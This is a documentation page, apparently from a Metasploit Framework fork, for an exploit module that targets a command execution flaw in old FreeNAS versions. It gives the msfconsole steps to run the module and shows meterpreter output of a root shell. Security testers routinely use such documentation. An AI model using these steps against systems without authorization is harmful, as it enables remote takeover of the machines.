dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/freenas_exec_raw.md

833 B
Raw Permalink Blame History

Vulnerable Application

This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/freenas_exec_raw
  4. Do: set rhost [ip]
  5. Do: run
  6. You should get a shell.

Options

Scenarios

Unknown

meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >